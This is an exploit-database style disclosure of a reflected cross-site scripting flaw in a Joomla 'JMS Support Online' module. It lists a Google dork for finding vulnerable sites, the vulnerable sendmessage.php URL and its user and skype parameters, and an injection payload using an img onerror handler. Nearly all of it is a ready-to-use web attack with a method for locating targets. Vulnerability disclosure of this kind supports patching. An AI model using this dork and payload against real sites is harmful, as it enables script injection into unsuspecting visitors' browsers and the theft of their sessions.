Exploit Title : Joomla JMS Support Online Module Reflected XSS - skype
extension
Google Dork :   inurl:sendmessage.php?type=skype
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : https://www.joommasters.com
Version: 3.6.5
Type : webapps
Platform: Joomla

------------------------------------------------

Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/sendmessage.php
Vulnerable Parameters: ?type=skype&user=<vulnerable>&skype=<vulnerable>
Method: GET
Payload:  "><img src=i onerror=prompt(2)>